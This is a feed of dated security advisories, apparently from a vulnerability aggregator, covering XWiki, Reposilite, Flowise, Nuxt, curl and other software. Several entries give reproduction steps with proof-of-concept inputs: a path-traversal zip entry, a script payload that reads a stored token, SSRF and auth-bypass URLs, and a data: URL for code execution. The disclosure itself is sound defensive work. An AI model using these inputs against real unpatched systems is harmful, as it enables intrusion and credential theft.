31.07.2024 23:20:28	maven	[MAVEN:GHSA-33GP-GMG3-HFPQ] XWiki Platform vulnerable to document deletion and overwrite from edit (moderate)	### ImpactWhen a user has edit but not view right on a page in XWiki, that user can delete the page and replace it by a page with new content without having delete right. The previous version of the page is moved into the recycle bin and can be restored from there by an admin. As the user is recorded as deleter, the user would in theory also be able to view the deleted content, but this is not directly possible as rights of the previous version are transferred to the new page and thus the user still doesn't have view right on the page. From all we examined, it therefore doesn't seem to be possible to exploit this to gain any rights.To reproduce, just replace `view` by `edit` in the URL of a page that you cannot view but edit and save. This should send the page to the recycle bin and replace it by an empty one if the XWiki installation is vulnerable. After the fix, an error is displayed when saving.### PatchesThis has been patched in XWiki 14.10.21, 15.5.5 and 15.10.6 by cancelling save operations by users when a new document shall be saved despite the document's existing already.### WorkaroundsWe're not aware of any workarounds.### References* https://jira.xwiki.org/browse/XWIKI-21553* https://github.com/xwiki/xwiki-platform/commit/c5efc1e519e710afdf3c5f40c0fcc300ad77149f	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-33GP-GMG3-HFPQ
31.07.2024 18:07:56	ubuntu	[USN-6935-1] Prometheus Alertmanager vulnerability (medium)	prometheus-alertmanager could be made to expose sensitive information over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6935-1
31.07.2024 13:51:55	ubuntu	[USN-6934-1] MySQL vulnerabilities (medium)	Several security issues were fixed in MySQL.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6934-1
31.07.2024 11:17:56	ubuntu	[USN-6933-1] ClickHouse vulnerabilities (high)	Several security issues were fixed in ClickHouse.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6933-1
31.07.2024 11:15:02	alpinelinux	[ALPINE:CVE-2024-7264] curl vulnerability	[From CVE-2024-7264] libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing anASN.1 Generalized Time field. If given an syntactically incorrect field, theparser might end up using -1 for the length of the time fraction, leading toa `strlen()` getting performed on a pointer to a heap buffer area that is not(purposely) null terminated.This flaw most likely leads to a crash, but can also lead to heap contentsgetting returned to the application when[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-7264
31.07.2024 12:57:12	curl	[CURL-CVE-2024-7264] ASN.1 date parser overread (low)	libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing anASN.1 Generalized Time field. If given an syntactically incorrect field, theparser might end up using -1 for the length of the time fraction, leading toa `strlen()` getting performed on a pointer to a heap buffer area that is not(purposely) null terminated.This flaw most likely leads to a crash, but can also lead to heap contentsgetting returned to the application when[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.	https://secdb.nttzen.cloud/security-advisory/curl/CURL-CVE-2024-7264
31.07.2024 08:07:36	ubuntu	[USN-6932-1] OpenJDK 21 vulnerabilities (high)	Several security issues were fixed in OpenJDK 21.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6932-1
31.07.2024 08:06:24	ubuntu	[USN-6931-1] OpenJDK 17 vulnerabilities (high)	Several security issues were fixed in OpenJDK 17.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6931-1
31.07.2024 08:04:53	ubuntu	[USN-6930-1] OpenJDK 11 vulnerabilities (high)	Several security issues were fixed in OpenJDK 11.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6930-1
31.07.2024 06:41:28	ubuntu	[USN-6929-1] OpenJDK 8 vulnerabilities (high)	Several security issues were fixed in OpenJDK 8.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6929-1
31.07.2024 03:00:00	debian	[DSA-5735-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5735-1
31.07.2024 03:00:00	oraclelinux	[ELSA-2024-4936] freeradius:3.0 security update (important)	[3.0.20-15]- Backport BlastRADIUS CVE fix Resolves: RHEL-46572	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4936
31.07.2024 18:29:36	npm	[NPM:GHSA-28MC-G557-92M7] @75lb/deep-merge Prototype Pollution vulnerability (high)	Prototype Pollution in 75lb deep-merge 1.1.1 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) and cause other impacts via merge methods of lodash to merge objects.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-28MC-G557-92M7
02.08.2024 04:20:14	npm	[NPM:GHSA-5CF7-CXRF-MQ73] Bostr Improper Authorization vulnerability (moderate)	Even with `authorized_keys` is filled with allowed pubkeys, If `noscraper` is enabled, It will allow anyone to use bqouncer even it's pubkey is not in `authorized_keys`.### Impact- Private bouncer### PatchesAvailable on version [3.0.10](https://github.com/Yonle/bostr/releases/tag/3.0.10)### WorkaroundsDisable `noscraper` if you have `authorized_keys` being set in config### ReferencesThis [line of code](https://github.com/Yonle/bostr/blob/8665374a66e2afb9f92d0414b0d6f420a95d5d2d/auth.js#L21) is the cause.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-5CF7-CXRF-MQ73
01.08.2024 23:25:09	ubuntu	[USN-6943-1] Tomcat vulnerabilities (high)	Several security issues were fixed in Tomcat.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6943-1
01.08.2024 19:54:51	ubuntu	[USN-6909-2] Bind vulnerabilities (high)	Several security issues were fixed in Bind.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6909-2
01.08.2024 18:09:46	ubuntu	[USN-6926-2] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6926-2
01.08.2024 17:27:25	ubuntu	[USN-6942-1] Gross vulnerability	Gross could be made to crash or to allow arbitary code execution.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6942-1
01.08.2024 16:39:54	ubuntu	[USN-6922-2] Linux kernel vulnerabilities (medium)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6922-2
01.08.2024 14:32:50	ubuntu	[USN-6941-1] Python vulnerability	Python could allow unintended access to network services.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6941-1
01.08.2024 09:35:51	ubuntu	[USN-6940-1] snapd vulnerabilities (medium)	Several security issues were fixed in snapd.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6940-1
01.08.2024 19:48:57	rubysec	[RUBYSEC:REXML-2024-41123] DoS vulnerabilities in REXML (medium)	There are some DoS vulnerabilities in REXML gem.These vulnerabilities have been assigned the CVE identifierCVE-2024-41123. We strongly recommend upgrading the REXML gem.## DetailsWhen parsing an XML document that has many specific characters suchas whitespace character, >] and ]>, REXML gem may take long time.Please update REXML gem to version 3.3.3 or later.## Affected versions* REXML gem 3.3.2 or prior## CreditsThanks to mprogrammer and scyoon for discovering these issues.## HistoryOriginally published at 2024-08-01 03:00:00 (UTC)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41123
01.08.2024 19:48:57	rubysec	[RUBYSEC:REXML-2024-41946] DoS vulnerabilities in REXML (medium)	There is a DoS vulnerability in REXML gem.This vulnerability has been assigned the CVE identifierCVE-2024-41946. We strongly recommend upgrading the REXML gem.## DetailsWhen parsing an XML that has many entity expansions with SAX2 orpull parser API, REXML gem may take long time.Please update REXML gem to version 3.3.3 or later.## Affected versions* REXML gem 3.3.2 or prior## CreditsThanks to NAITOH Jun for discovering and fixing this issue.## HistoryOriginally published at 2024-08-01 03:00:00 (UTC)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41946
03.08.2024 00:32:27	maven	[MAVEN:GHSA-FRVJ-CFQ4-3228] Path traversal in Reposilite javadoc file expansion (arbitrary file creation/overwrite) (`GHSL-2024-073`) (high)	### SummaryReposilite v3.5.10 is affected by an Arbitrary File Upload vulnerability via path traversal in expanding of Javadoc archives.### DetailsReposilite provides support for JavaDocs files, which are archives that contain documentation for artifacts. Specifically, [JavadocEndpoints.kt](https://github.com/dzikoysk/reposilite/blob/68b73f19dc9811ccf10936430cf17f7b0e622bd6/reposilite-backend/src/main/kotlin/com/reposilite/javadocs/infrastructure/JavadocEndpoints.kt#L28) controller allows to expand the javadoc archive into the server's file system and return its content. The problem is in the way how the archives are expanded, specifically how the new filename is created:[JavadocContainerService.kt#L127-L136](https://github.com/dzikoysk/reposilite/blob/68b73f19dc9811ccf10936430cf17f7b0e622bd6/reposilite-backend/src/main/kotlin/com/reposilite/javadocs/JavadocContainerService.kt#L127-L136)```kotlinjarFile.entries().asSequence().forEach { file -> if (file.isDirectory) { return@forEach } val path = Paths.get(javadocUnpackPath.toString() + "/" + file.name) path.parent?.also { parent -> Files.createDirectories(parent) } jarFile.getInputStream(file).copyToAndClose(path.outputStream())}.asSuccess<Unit, ErrorResponse>()```The `file.name` taken from the archive can contain path traversal characters, such as '/../../../anything.txt', so the resulting extraction path can be outside the target directory.### ImpactIf the archive is taken from an untrusted source, such as Maven Central or JitPack for example, an attacker can craft a special archive to overwrite any local file on Reposilite instance. This could lead to remote code execution, for example by placing a new plugin into the '$workspace$/plugins' directory. Alternatively, an attacker can overwrite the content of any other package.Note that the attacker can use its own malicious package from Maven Central to overwrite any other package on Reposilite.### Steps to reproduce1. Create a malicious javadoc archive that contains filenames with path traversal characters:```bashzip test-1.0-javadoc.jar ../../../../../../../../tmp/evil.txt index.html```Make sure that `../../../../../../../../tmp/evil.txt` and `index.html` files exist on the system where you create this archive.2. Publish this archive to the repository which Reposilite is mirroring, such as Maven Central or JitPack. For the test purposes, I used my own server that imitates the upstream maven repository:http://artsploit.com/maven/com/artsploit/reposilite-zipslip/1.0/reposilite-zipslip-1.0-javadoc.jar3. Start Reposilite with 'releases' repository mirroring to 'http://artsploit.com/maven/'4. Now, if the attacker send the request to http://localhost:8080/javadoc/releases/com/artsploit/reposilite-zipslip/1.0, the aforementioned archive will be obtained from the http://artsploit.com/maven/com/artsploit/reposilite-zipslip/1.0/reposilite-zipslip-1.0-javadoc.jar address and its 'evil.txt' file will be expanded to '$workspace$/tmp/evil.txt'. Note that to perform this action, an attacker does not need to provide any credentials, as fetching from the mirrored repository does not require authentication.6. Confirm that '$workspace$/tmp/evil.txt' is created on the server where Reposilite is running.### RemediationNormalize (remove all occurrences of `/../`) the `file.name` variable before concatenating it with `javadocUnpackPath`. E.g.:```kotlinval path = Paths.get(javadocUnpackPath.toString() + "/" + Paths.get(file.name).normalize().toString())```	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-FRVJ-CFQ4-3228
03.08.2024 00:12:57	maven	[MAVEN:GHSA-9W8W-34VR-65J2] Reposilite artifacts vulnerable to Stored Cross-site Scripting (high)	### SummaryReposilite v3.5.10 is affected by Stored Cross-Site Scripting (XSS) when displaying artifact's content in the browser.### DetailsAs a Maven repository manager, Reposilite provides the ability to view the artifacts content in the browser, as well as perform administrative tasks via API. The problem lies in the fact that the artifact's content is served via the same origin (protocol/host/port) as the Admin UI. If the artifact contains HTML content with javascript inside, the javascript is executed within the same origin. Therefore, if an authenticated user is viewing the artifacts content, the javascript inside can access the browser's local storage where the user's password (aka 'token-secret') is stored.It is especially dangerous in scenarios where Reposilite is configured to mirror third party repositories, like the Maven Central Repository. Since anyone can publish an artifact to Maven Central under its own name, such malicious packages can be used to attack the Reposilite instance.### Steps to reproduceTo demonstrate this vulnerability, we can start Reposilite with default settings at localhost:8080 and configure its 'release' repository to mirror https://artsploit.com/maven. This is my own website intended to emulate http://repo1.maven.org/, but it also contains a proof-of-concept payload for this vulnerability. Technically I could publish this payload to Maven Central Repository, but I don't want to clutter it.Then, as an administrator or authenticated Reposilite user, navigate to http://localhost:8080/releases/com/artsploit/reposilite-xss/1.0/reposilite-xss-1.0.pom in the browser.This file contains the basic `application/xml` payload:```xml<?xml version="1.0" encoding="UTF-8"?><a:script xmlns:a="http://www.w3.org/1999/xhtml"> alert(`Secret key: ${localStorage.getItem('token-secret')}`)</a:script>```The script will be executed within the http://localhost:8080/ origin and the leaked token is displayed.![image](https://github.com/dzikoysk/reposilite/assets/44605151/e6324fc8-fa7f-485c-90b3-19640c179773)### ImpactThis issue may lead to the full Reposilite instance compromise. If this attack is performed against the admin user, it's possible to use the admin API to modify settings and artifacts on the instance. In the worst case scenario, an attacker would be able to obtain the Remote code execution on all systems that use artifacts from Reposilite.It's important to note that the attacker does not need to lure a victim user to use a malicious artifact, but just open a link in the browser. This link can be silently loaded among the other HTML content, making this attack unnoticeable.Even if the Reposilite instance is located in an isolated environment, such as behind a VPN or in the local network, this attack is still possible as it can be performed from the admin browser.### RemediationWhen serving artifact's content via HTTPS, it's important to understand that this content might be potentially untrusted HTML code, so the javascript execution should be restricted.Consider the following options to remediate this vulnerability:* [preferred] Use the "Content-Security-Policy: sandbox;" header when serving artifact's content. This makes the resource treated as being from a special origin that always fails the same-origin policy (potentially preventing access to data storage/cookies and some JavaScript APIs).* [not preferred, but also works] Use the "Content-Disposition: attachment" header. This will prevent the browser from displaying the content entirely, so it just saves it to the local filesystem.Additionally, we strongly recommend reconsidering how the website authentication works for Reposilite. Storing user's passwords in plaintext in the browser's local storage is not an ideal option. The more robust and secure option would be to issue a one time session ID or a token to the browser after checking the login/password on the server. These session IDs or tokens should have limited validity time, so their compromise would be trickier to exploit.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-9W8W-34VR-65J2
02.08.2024 18:16:43	maven	[MAVEN:GHSA-V352-RG37-5Q5M] Apache Linkis vulnerable to privilege escalation (moderate)	In Apache Linkis <= 1.5.0, Privilege Escalation in Basic management services where the attacking user is a trusted account allows access to Linkis's Token information. Users are advised to upgrade to version 1.6.0, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V352-RG37-5Q5M
02.08.2024 18:16:26	maven	[MAVEN:GHSA-QFF2-8QW7-HCVW] Apache Inlong Code Injection vulnerability (critical)	Improper Control of Generation of Code ('Code Injection') vulnerability in Apache InLong.This issue affects Apache InLong: from 1.10.0 through 1.12.0, which could lead to Remote Code Execution. Users are advised to upgrade to Apache InLong's 1.13.0 or cherry-pick [1] to solve it.[1] https://github.com/apache/inlong/pull/10251	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-QFF2-8QW7-HCVW
02.08.2024 18:16:08	maven	[MAVEN:GHSA-J6VX-R77H-44WC] Apache Linkis arbitrary file deletion vulnerability (high)	In Apache Linkis <= 1.5.0, Arbitrary file deletion in Basic management services on a user with an administrator account could delete any file accessible by the Linkis system user. Users are recommended to upgrade to version 1.6.0, which fixes this issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-J6VX-R77H-44WC
02.08.2024 12:36:04	ubuntu	[USN-6895-4] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-4
03.08.2024 05:22:00	rubysec	[RUBYSEC:REXML-2024-41123] DoS vulnerabilities in REXML (medium)	There are some DoS vulnerabilities in REXML gem.These vulnerabilities have been assigned the CVE identifierCVE-2024-41123. We strongly recommend upgrading the REXML gem.## DetailsWhen parsing an XML document that has many specific characters suchas whitespace character, >] and ]>, REXML gem may take long time.Please update REXML gem to version 3.3.3 or later.## Affected versions* REXML gem 3.3.2 or prior## CreditsThanks to mprogrammer and scyoon for discovering these issues.## HistoryOriginally published at 2024-08-01 03:00:00 (UTC)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41123
03.08.2024 16:38:42	rubysec	[RUBYSEC:REXML-2024-41946] DoS vulnerabilities in REXML (medium)	There is a DoS vulnerability in REXML gem.This vulnerability has been assigned the CVE identifierCVE-2024-41946. We strongly recommend upgrading the REXML gem.## DetailsWhen parsing an XML that has many entity expansions with SAX2 orpull parser API, REXML gem may take long time.Please update REXML gem to version 3.3.3 or later.## Affected versions* REXML gem 3.3.2 or prior## CreditsThanks to NAITOH Jun for discovering and fixing this issue.## HistoryOriginally published at 2024-08-01 03:00:00 (UTC)	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-41946
06.08.2024 00:29:30	npm	[NPM:GHSA-858C-QXVX-RG9V] Flowise Cross-site Scripting in /api/v1/chatflows-streaming/id (moderate)	Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/chatflows-streaming/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-858C-QXVX-RG9V
06.08.2024 00:29:30	npm	[NPM:GHSA-WXM4-9F8P-GGGV] Flowise Cross-site Scripting in/api/v1/credentials/id (moderate)	Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/credentials/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WXM4-9F8P-GGGV
06.08.2024 00:29:29	npm	[NPM:GHSA-2JCH-QC96-9F5G] Flowise Cross-site Scripting in api/v1/chatflows/id (moderate)	Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `api/v1/chatflows/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2JCH-QC96-9F5G
06.08.2024 00:29:29	npm	[NPM:GHSA-FCCX-2PWJ-HRQ7] Flowise Cross-site Scripting in /api/v1/public-chatflows/id (moderate)	Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, a reflected cross-site scripting vulnerability occurs in the `/api/v1/public-chatflows/id` endpoint. If the default configuration is used (unauthenticated), an attacker may be able to craft a specially crafted URL that injects Javascript into the user sessions, allowing the attacker to steal information, create false popups, or even redirect the user to other websites without interaction. If the chatflow ID is not found, its value is reflected in the 404 page, which has type text/html. This allows an attacker to attach arbitrary scripts to the page, allowing an attacker to steal sensitive information. This XSS may be chained with the path injection to allow an attacker without direct access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-FCCX-2PWJ-HRQ7
06.08.2024 00:29:28	maven	[MAVEN:GHSA-W7C4-5W4F-JM3G] Reposilite Arbitrary File Read vulnerability (high)	Reposilite is an open source, lightweight and easy-to-use repository manager for Maven based artifacts in JVM ecosystem. Reposilite v3.5.10 is affected by an Arbitrary File Read vulnerability via path traversal while serving expanded javadoc files. Reposilite has addressed this issue in version 3.5.12. There are no known workarounds for this vulnerability. This issue was discovered and reported by the GitHub Security lab and is also tracked as GHSL-2024-074.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-W7C4-5W4F-JM3G
06.08.2024 00:29:28	npm	[NPM:GHSA-H997-3FXJ-P5J8] Flowise Path Injection at /api/v1/openai-assistants-file (high)	Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, the `/api/v1/openai-assistants-file` endpoint in `index.ts` is vulnerable to arbitrary file read due to lack of sanitization of the `fileName` body parameter. No known patches for this issue are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-H997-3FXJ-P5J8
06.08.2024 00:29:28	npm	[NPM:GHSA-66F2-XXGM-F6XP] Flowise Cors Misconfiguration in packages/server/src/index.ts (high)	Flowise is a drag & drop user interface to build a customized large language model flow. In version 1.4.3 of Flowise, A CORS misconfiguration sets the Access-Control-Allow-Origin header to all, allowing arbitrary origins to connect to the website. In the default configuration (unauthenticated), arbitrary origins may be able to make requests to Flowise, stealing information from the user. This CORS misconfiguration may be chained with the path injection to allow an attacker attackers without access to Flowise to read arbitrary files from the Flowise server. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-66F2-XXGM-F6XP
06.08.2024 00:29:25	npm	[NPM:GHSA-QF3Q-9F3H-CJP9] NextChat has full-read SSRF and XSS vulnerability in /api/cors endpoint (critical)	NextChat, also known as ChatGPT-Next-Web, is a cross-platform chat user interface for use with ChatGPT. Versions 2.11.2 and prior are vulnerable to server-side request forgery and cross-site scripting. This vulnerability enables read access to internal HTTP endpoints but also write access using HTTP POST, PUT, and other methods. Attackers can also use this vulnerability to mask their source IP by forwarding malicious traffic intended for other Internet targets through these open proxies. As of time of publication, no patch is available, but other mitigation strategies are available. Users may avoid exposing the application to the public internet or, if exposing the application to the internet, ensure it is an isolated network with no access to any other internal resources.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QF3Q-9F3H-CJP9
06.08.2024 00:29:23	maven	[MAVEN:GHSA-F984-3WX8-GRP9] XXL-RPC Deserialization of Untrusted Data vulnerability (critical)	XXL-RPC is a high performance, distributed RPC framework. With it, a TCP server can be set up using the Netty framework and the Hessian serialization mechanism. When such a configuration is used, attackers may be able to connect to the server and provide malicious serialized objects that, once deserialized, force it to execute arbitrary code. This can be abused to take control of the machine the server is running by way of remote code execution. This issue has not been fixed.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F984-3WX8-GRP9
06.08.2024 00:29:23	maven	[MAVEN:GHSA-4HVC-QWR2-F8RV] Redisson vulnerable to Deserialization of Untrusted Data (critical)	Redisson is a Java Redis client that uses the Netty framework. Prior to version 3.22.0, some of the messages received from the Redis server contain Java objects that the client deserializes without further validation. Attackers that manage to trick clients into communicating with a malicious server can include especially crafted objects in its responses that, once deserialized by the client, force it to execute arbitrary code. This can be abused to take control of the machine the client is running in. Version 3.22.0 contains a patch for this issue.Some post-fix advice is available. Do NOT use `Kryo5Codec` as deserialization codec, as it is still vulnerable to arbitrary object deserialization due to the `setRegistrationRequired(false)` call. On the contrary, `KryoCodec` is safe to use. The fix applied to `SerializationCodec` only consists of adding an optional allowlist of class names, even though making this behavior the default is recommended. When instantiating `SerializationCodec` please use the `SerializationCodec(ClassLoader classLoader, Set<String> allowedClasses)` constructor to restrict the allowed classes for deserialization.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-4HVC-QWR2-F8RV
06.08.2024 00:29:23	npm	[NPM:GHSA-XMHH-XRCC-MX36] Scrypted Cross-site Scripting vulnerability (moderate)	Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the `owner' and 'pkg` parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-XMHH-XRCC-MX36
06.08.2024 00:29:23	npm	[NPM:GHSA-WW7P-8GFG-V82R] Scrypted Cross-site Scripting vulnerability (moderate)	Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior (corresponding to `@scrypted/core` 0.1.142 and prior), a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-WW7P-8GFG-V82R
06.08.2024 00:19:01	maven	[MAVEN:GHSA-P78H-M8PV-G9GM] Apereo CAS vulnerable to credential leaks for LDAP authentication (moderate)	Apereo CAS is an open source multilingual single sign-on solution for the web. Apereo CAS can be configured to use authentication based on client X509 certificates. These certificates can be provided via TLS handshake or a special HTTP header, such as “ssl_client_cert”. When checking the validity of the provided client certificate, X509CredentialsAuthenticationHandler performs check that this certificate is not revoked. To do so, it fetches URLs provided in the “CRL Distribution Points” extension of the certificate, which are taken from the certificate itself and therefore can be controlled by a malicious user. If the CAS server is configured to use an LDAP server for x509 authentication with a password, for example by setting a “cas.authn.x509.ldap.ldap-url” and “cas.authn.x509.ldap.bind-credential” properties, X509CredentialsAuthenticationHandler fetches revocation URLs from the certificate, which can be LDAP urls. When making requests to this LDAP urls, Apereo CAS uses the same password as for initially configured LDAP server, which can lead to a password leak. An unauthenticated user can leak the password used to LDAP connection configured on server. This issue has been addressed in version 6.6.6. Users are advised to upgrade. There are no known workarounds for this vulnerability.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P78H-M8PV-G9GM
06.08.2024 00:19:01	maven	[MAVEN:GHSA-WHR2-9X5F-5C79] Alpine allows Authentication Filter bypass (moderate)	Alpine is a scaffolding library in Java. Alpine prior to version 1.10.4 allows Authentication Filter bypass. The AuthenticationFilter relies on the request URI to evaluate if the user is accessing the swagger endpoint. By accessing a URL with a path such as /api/foo;%2fapi%2fswagger the contains condition will hold and will return from the authentication filter without aborting the request. Note that the principal object will not be assigned and therefore the issue wont allow user impersonation. This issue has been fixed in version 1.10.4. There are no known workarounds.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WHR2-9X5F-5C79
06.08.2024 00:19:01	maven	[MAVEN:GHSA-2W4P-2HF7-GH8X] Alpine allows URL access filter bypass (high)	Alpine is a scaffolding library in Java. Alpine prior to version 1.10.4 allows URL access filter bypass. This issue has been fixed in version 1.10.4. There are no known workarounds.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-2W4P-2HF7-GH8X
06.08.2024 00:19:01	npm	[NPM:GHSA-6MVJ-2569-3MCM] Editor.js vulnerable to Code Injection (moderate)	Editor.js is a block-style editor with clean JSON output. Versions prior to 2.26.0 are vulnerable to Code Injection via pasted input. The processHTML method passes pasted input into wrapper’s innerHTML. This issue is patched in version 2.26.0.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-6MVJ-2569-3MCM
05.08.2024 22:49:56	npm	[NPM:GHSA-CXGV-PX37-4MP2] Nuxt Icon affected by a Server-Side Request Forgery (SSRF) (high)	### Summary`nuxt/icon` provides an API to allow client side icon lookup. This endpoint is at `/api/_nuxt_icon/[name]`.The proxied request path is improperly parsed, allowing an attacker to change the scheme and host of the request. This leads to SSRF, and could potentially lead to sensitive data exposure.### DetailsThe `new URL` constructor is used to parse the final path. This constructor can be passed a relative scheme or path in order to change the host the request is sent to. This constructor is also very tolerant of poorly formatted URLs.As a result we can pass a path prefixed with the string `http:`. This has the effect of changing the scheme to HTTP. We can then subsequently pass a new host, for example `http:127.0.0.1:8080`. This would allow us to send requests to a local server. ### PoCMake a request to `/api/_nuxt_icon/http:example.com`, observe the data returned has been fetched from a different resource than intended. I typically try to find an example within Nuxt infrastructure that is vulnerable to these types of bugs, but I could not identify any with this endpoint enabled.### Impact+ SSRF, potential sensitive data exposure.+ I do not believe this can be chained into an XSS, but it may be possible.+ Does not have a security impact on services deployed on Cloudflare Workers.+ Does not impact certain builds and modes (like static builds).+ Can be mitigated using by disabling the `fallbackToApi` option.### Fix+ Ensure the host has not been changed after the path is parsed.+ Alternatively, prefix the path with `./`.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-CXGV-PX37-4MP2
05.08.2024 22:49:46	npm	[NPM:GHSA-V784-FJJH-F8R4] Nuxt vulnerable to remote code execution via the browser when running the test locally (high)	### SummaryDue to the insufficient validation of the `path` parameter in the NuxtTestComponentWrapper, an attacker can execute arbitrary JavaScript on the server side, which allows them to execute arbitrary commands.### DetailsWhile running the test, a special component named `NuxtTestComponentWrapper` is available.https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/nuxt-root.vue#L42-L43This component loads the specified path as a component and renders it.https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L9-L27There is a validation for the `path` parameter to check whether the path traversal is performed, but this check is not sufficient.https://github.com/nuxt/nuxt/blob/4779f5906fa4d3c784c2e2d6fe5a5c5f181faaec/packages/nuxt/src/app/components/test-component-wrapper.ts#L15-L19Since `import(...)` uses `query.path` instead of the normalized `path`, a non-normalized URL can reach the `import(...)` function.For example, passing something like `./components/test` normalizes `path` to `/root/directory/components/test`, but `import(...)` still receives `./components/test`.By using this behavior, it's possible to load arbitrary JavaScript by using the path like the following:```data:text/javascript;base64,Y29uc29sZS5sb2coMSk```Since `resolve(...)` resolves the filesystem path, not the URI, the above URI is treated as a relative path, but `import(...)` sees it as an absolute URI, and loads it as a JavaScript.### PoC1. Create a nuxt project and run it in the test mode:```npx nuxi@latest init testcd testTEST=true npm run dev```2. Open the following 